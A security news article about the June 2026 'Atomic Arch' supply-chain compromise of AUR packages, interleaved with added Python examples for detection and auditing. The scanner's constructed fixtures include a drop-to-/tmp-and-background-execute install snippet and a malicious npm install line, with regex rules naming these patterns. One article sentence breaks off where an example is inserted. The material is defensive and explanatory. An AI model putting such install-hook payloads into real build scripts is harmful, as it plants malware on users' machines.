Arch Linux attack: Atomic Arch Campaign Compromises 2,000 AUR Packages

The open-source software ecosystem relies on a delicate foundation of collective trust, peer review, and distributed responsibility. On June 11, 2026, that foundation was severely tested when security researchers identified a highly coordinated and expanding supply chain campaign targeting the Arch User Repository (AUR). Dubbed “Atomic Arch” by security labs, this sophisticated campaign has systematically compromised nearly 2,000 community-maintained software packages. This widespread Arch Linux attack has sent shockwaves through the Linux developer community, exposing critical systemic vulnerabilities in how third-party, community-driven software repositories govern package adoption, verify commit histories, and police pre-installation scripts.

Understanding the Vector: The Arch User Repository and Orphaned Packages

Unlike the core repositories of Arch Linux—which are heavily vetted and maintained by authorized developers—the Arch User Repository (AUR) is an unmoderated, community-driven catalog. It does not store pre-compiled binaries. Instead, it hosts user-submitted build recipes known as PKGBUILD files. These are shell scripts containing instructions on how to download, compile, and install third-party applications on the host system. AUR helpers like yay and paru automate the retrieval and execution of these scripts, compiling the code directly on the user’s local machine.

A longstanding feature of the AUR governance model is the concept of orphaned packages. If an original package maintainer becomes inactive, abandons a utility, or steps away from the community, the package is flagged as “orphaned”. Any registered AUR user can legally petition for ownership or adopt the project outright to keep it updated. The “Atomic Arch” threat actors weaponized this exact trust model. They systematically identified and adopted hundreds of abandoned packages, exploiting the lack of multi-factor verification or human oversight in the adoption process.

To deepen the deception, the attackers did not simply push updates under a newly registered alias. They spoofed Git commit metadata to make it appear as though the malicious updates were pushed by the project’s original, highly trusted, and long-standing maintainers. By altering the committer’s name and email (frequently changing them to spoofed domains like foryou[.]net or generic Gmail accounts), they bypassed the visual inspection of casual auditors. This left the target’s build history looking perfectly normal, successfully exploiting the developer trust model without needing to compromise the actual developer’s credentials.

The Mechanics of the First Wave: Arbitrary JS Execution

In the initial phase of the campaign, which began around June 11, 2026, the compromised PKGBUILD and associated .install scripts were modified to include a post-install or build-time hook. While users expected the script to fetch downstream C or Rust source code, compile it, and generate a local package, the altered build recipes executed JavaScript-based package managers. The compromised scripts quietly ran commands like npm install, bun install, or yarn to pull malicious packages directly from the public npm registry under the guise of dependency resolution.

The primary malicious packages identified in the first wave include:

  • atomic-lockfile (most notably version 1.4.2)
  • lockfile-js
  • js-digest (and its subsequent variant, digest-js)

To provide plausible cover, these rogue npm packages were often downloaded alongside legitimate node modules. However, the malicious packages carried a fatal instruction nested inside their package.json manifest: a "preinstall": "./src/hooks/deps" hook. The moment the JS package manager resolved the dependencies, the preinstall hook executed a bundled Linux ELF binary named deps. This bypassed any native sandbox protections, running compiled machine code directly on the build system.
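As an added example (not code from the article or from any project it names), the check below reads an npm package's package.json, lists its lifecycle hooks and flags any hook whose command runs a file bundled inside the package that carries the ELF magic, which is exactly the "preinstall": "./src/hooks/deps" shape described above; the sample package it builds is constructed, with a header-only stub in place of a binary.

```python
import json
import os
import shlex
import tempfile

ELF_MAGIC = b"\x7fELF"
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

def is_elf(path):
    """True if the file starts with the ELF magic, i.e. it is native machine code."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False

def audit_npm_package(pkg_dir):
    """Return (severity, hook, detail) findings for lifecycle hooks in package.json.
    Every token of a hook command that resolves to a file inside the package is
    opened; a hook that runs a bundled ELF is the "preinstall": "./src/hooks/deps"
    pattern from the first wave."""
    findings = []
    with open(os.path.join(pkg_dir, "package.json"), "rb") as fh:
        scripts = json.load(fh).get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        findings.append(("info", hook, cmd))          # any hook deserves a look
        for token in shlex.split(cmd):
            target = os.path.normpath(os.path.join(pkg_dir, token))
            if target.startswith(pkg_dir) and is_elf(target):
                findings.append(("critical", hook, f"runs bundled ELF binary {token}"))
    return findings

def build_sample_package():
    """Constructed sample: manifest with a preinstall hook plus a stub file that only
    carries an ELF header (not a real or runnable binary)."""
    pkg_dir = tempfile.mkdtemp(prefix="npm-sample-")
    os.makedirs(os.path.join(pkg_dir, "src", "hooks"))
    with open(os.path.join(pkg_dir, "package.json"), "w") as fh:
        json.dump({"name": "sample-package", "version": "0.0.1",
                   "scripts": {"preinstall": "./src/hooks/deps"}}, fh)
    with open(os.path.join(pkg_dir, "src", "hooks", "deps"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 13)
    return pkg_dir
```

Run audit_npm_package() over each directory under node_modules after a build to see which hooks would have executed native code.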

Deep Dive Into the Payload: Infostealer and eBPF Rootkit

The compiled deps binary (determined by reverse-engineers to be compiled from Rust) was designed as a dual-mode payload. Its behavior diverged dramatically based on the permission level of the process executing the AUR compilation.

User-Space Credential Harvester

When executed with standard user privileges, the deps binary acted as an extremely aggressive information stealer. Rather than targeting generic consumer data, it specifically targeted developer workstations, local build environments, and system administrator assets. The malware systematically audited the victim’s filesystem to harvest the following data:

  • Developer Secrets & Cloud Keys: GitHub SSH keys, npm publication tokens, HashiCorp Vault configurations, AWS credentials, and local Docker/Podman configuration profiles.
  • Application Data: Browser cookies, Electron application databases, and local session tokens for communication platforms like Slack, Microsoft Teams, and Discord.
  • System Footprints: Active shell histories (e.g., .bash_history, .zsh_history), VPN configuration files, SSH known hosts, and private key files.

Kernel-Space eBPF Rootkit

If the user compiled or installed the package using root privileges (which is common when installing system utilities or using poorly configured AUR helpers that escalate privileges), the malware took a far more dangerous path. It used its administrative authority to deploy an eBPF-based rootkit.

Extended Berkeley Packet Filter (eBPF) is a powerful technology built directly into the Linux kernel that allows sandboxed programs to run in response to specific kernel events. While typically used for high-performance networking and system observability, the “Atomic Arch” attackers used it for hyper-stealth persistence. Once loaded, the eBPF programs hooked critical kernel syscalls—such as directory listings, process signals, and network socket reads—to achieve absolute invisibility. The rootkit silently omitted its own process IDs, configuration files, and active Command and Control (C2) network connections from user-space reporting tools. As a result, standard security tools like ps, lsof, netstat, and even modern Endpoint Detection and Response (EDR) agents running on the system were completely blind to the intrusion.

The Evolution: The Stealthy Second Wave on June 14, 2026

By June 12, Arch Linux Trusted Users and package maintainers had actively begun deleting compromised packages, disabling the hijacked developer accounts, and cleaning the database. However, on June 14, 2026, the threat actors launched a highly coordinated second wave that circumvented the initial remediation efforts. This secondary wave pushed the number of compromised packages from the initial 400 to nearly 2,000.

In this second wave, the attackers completely abandoned the noisy, predictable pattern of calling npm install atomic-lockfile or bun install js-digest directly inside the PKGBUILD. Automated security scanners that the community had set up to search for these strings were instantly bypassed. Instead, the attackers implemented heavily obfuscated scripting within the .install files. This obfuscated code dropped a tiny, highly compressed, and seemingly benign program directly into the system’s temporary directory (usually /tmp). Once the installation concluded, this program was executed in the background. It quietly connected to external C2 servers, decrypted a secondary payload, and executed dynamic JavaScript code to install the rootkit and credential stealer post-installation. This decoupled delivery mechanism bypassed simple static checks, making analysis of the raw PKGBUILD files exceptionally difficult.
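Added example, not the community scanners the text refers to: a small rule-based scanner over PKGBUILD/.install text that catches the first-wave strings and, separately, the behavioural pattern of the second wave (a decode stage, a drop into /tmp, background execution of the dropped file). The three sample scripts are constructed and use generic file names, not the campaign's.

```python
import re

# Each rule: (name, compiled regex). Applied line by line to PKGBUILD/.install text.
RULES = [
    ("js-pkg-manager-in-build",
     re.compile(r"\b(npm|bun|yarn|pnpm)\s+(install|add|i)\b")),
    ("known-atomic-arch-package",
     re.compile(r"\b(atomic-lockfile|lockfile-js|js-digest|digest-js)\b")),
    ("decode-or-eval-stage",
     re.compile(r"base64\s+(-d|--decode)\b|\beval\s|\bxxd\s+-r\b")),
    ("drop-to-tmp",
     re.compile(r">\s*/tmp/\S+|chmod\s+\+x\s+/tmp/\S+")),
    ("background-exec-from-tmp",
     re.compile(r"(nohup|setsid)?\s*/tmp/\S+.*&\s*$")),
]

def scan_build_script(text):
    """Return (line_no, rule_name, line) for every rule hit; the first two rules
    catch the first wave, the behavioural rules catch the decoupled second wave."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((no, name, line.strip()))
    return hits

def verdict(hits):
    """A known package name, or a drop+background pair, is 'malicious'; any other
    single hit is 'suspicious'; no hits is 'clean'."""
    names = {name for _, name, _ in hits}
    if "known-atomic-arch-package" in names or {"drop-to-tmp", "background-exec-from-tmp"} <= names:
        return "malicious"
    return "suspicious" if hits else "clean"

# Constructed samples (not real AUR content): one per wave, plus a benign .install.
FIRST_WAVE = """post_install() {
  npm install atomic-lockfile@1.4.2 >/dev/null 2>&1
}
"""
SECOND_WAVE = """post_install() {
  echo "$_blob" | base64 -d > /tmp/.pacman-helper
  chmod +x /tmp/.pacman-helper
  nohup /tmp/.pacman-helper >/dev/null 2>&1 &
}
"""
BENIGN = """post_install() {
  systemctl daemon-reload
}
"""
```

Feed it the PKGBUILD and every *.install file from a cloned AUR repository before running makepkg; a "suspicious" verdict is a prompt to read the file, not a conviction.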

Downstream Impact of the Arch Linux Attack on Derivative Distributions

Because the AUR is the backbone for the extended Arch ecosystem, the fallout of this massive Arch Linux attack has spilled over into downstream distributions. Derivatives that rely directly or indirectly on AUR accessibility—such as CachyOS, EndeavourOS, Garuda Linux, and Manjaro Linux—have all issued urgent security bulletins. While these operating systems maintain their own repositories for core system packages, their users regularly use AUR helpers to install proprietary software, specialized gaming utilities, and developer tools. This has left their user bases equally vulnerable to system-wide compromises and silent kernel-level rootkits.

How to Audit, Mitigate, and Secure Your System

The Arch Linux community has responded with rapid development of decentralized auditing tools. Security researcher lenucksi, along with contributors from across the open-source community, consolidated various detection concepts into a comprehensive auditing utility: the aur-malware-check repository. This tool is designed to scan local installations, historical package manager logs, and kernel structures to locate indicators of compromise (IOCs).

Auditing Your Local Installation

To quickly check your local machine against known affected packages, users can run the following read-only commands in their terminal to query foreign packages and check them against the community-curated database of compromised packages:

# Step 1: Identify all locally installed foreign (AUR) packages
pacman -Qmq | sort > /tmp/local-aur.txt

# Step 2: Download the latest consolidated list of compromised package names
curl -fsS --proto '=https' https://raw.githubusercontent.com/lenucksi/aur-malware-check/master/package_list.txt | sort -u > /tmp/compromised-list.txt

# Step 3: Intersect the lists to see if you have any matches
comm -12 /tmp/local-aur.txt /tmp/compromised-list.txt

For a deeper system-level investigation, users should check their system logs for historical installations that may have been uninstalled or updated during the active infection window (starting June 9, 2026). Run the following commands to check your transaction logs and local directories:

# Search your pacman transaction log for malicious packages
grep -Ei "atomic-lockfile|js-digest|lockfile-js" /var/log/pacman.log

# Check your global npm and bun cache directories for malicious locks
grep -rl "atomic-lockfile" ~/.npm ~/.cache/yarn ~/.bun 2>/dev/null

Checking for Systemd Persistence and the eBPF Rootkit

The malware also attempts to persist by writing systemd services. You can scan for suspicious, rapid-restarting user services with the following command:

# Audit systemd unit configurations for malicious persistent loops
grep -RA1 'Restart=always' {/etc/systemd/system,~/.config/systemd/user/} 2>/dev/null | grep -B1 RestartSec=30

Because the eBPF rootkit hides itself from standard process monitors, users must directly query the virtual filesystem where eBPF maps reside. Run the following command to check
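Added example, not the article's command: enumerating loaded eBPF objects by walking /proc/<pid>/fd for anon_inode:bpf-prog (or bpf-map, bpf-link) symlinks and reading the matching fdinfo, which is the same kernel-provided data bpftool reads, without depending on ps or lsof output. The /proc tree used here is constructed so the example runs offline; on a live host you would call enumerate_bpf_objects() with the default "/proc" as root.

```python
import os
import re
import tempfile

BPF_LINK_RE = re.compile(r"^anon_inode:bpf-(prog|map|link)$")

def enumerate_bpf_objects(proc_root="/proc"):
    """Report every open eBPF program/map/link fd found under proc_root.
    The fd link target reads 'anon_inode:bpf-prog' (or bpf-map/bpf-link) and the
    matching fdinfo file carries prog_type/prog_id straight from the kernel."""
    found = []
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        fd_dir = os.path.join(proc_root, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:  # process exited, or fd table not readable (run as root)
            continue
        for fd in fds:
            try:
                m = BPF_LINK_RE.match(os.readlink(os.path.join(fd_dir, fd)))
            except OSError:
                continue
            if not m:
                continue
            info = {"pid": int(pid), "fd": int(fd), "kind": m.group(1)}
            try:
                with open(os.path.join(proc_root, pid, "fdinfo", fd)) as fh:
                    for line in fh:
                        key, _, value = line.partition(":")
                        if key in ("prog_type", "prog_id", "map_type", "map_id"):
                            info[key] = int(value)
            except OSError:
                pass
            found.append(info)
    return found

def build_sample_proc():
    """Constructed /proc lookalike: pid 4242 holds a bpf-prog on fd 7, stdin on fd 0."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    os.makedirs(os.path.join(root, "4242", "fd"))
    os.makedirs(os.path.join(root, "4242", "fdinfo"))
    os.symlink("anon_inode:bpf-prog", os.path.join(root, "4242", "fd", "7"))
    os.symlink("/dev/null", os.path.join(root, "4242", "fd", "0"))
    with open(os.path.join(root, "4242", "fdinfo", "7"), "w") as fh:
        fh.write("pos:\t0\nflags:\t02000002\nprog_type:\t2\nprog_id:\t9001\n")
    return root
```

Objects pinned under /sys/fs/bpf outlive the process that loaded them, so walk that directory with os.walk as well and treat any program or map you cannot attribute to a known tool as a finding worth investigating.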
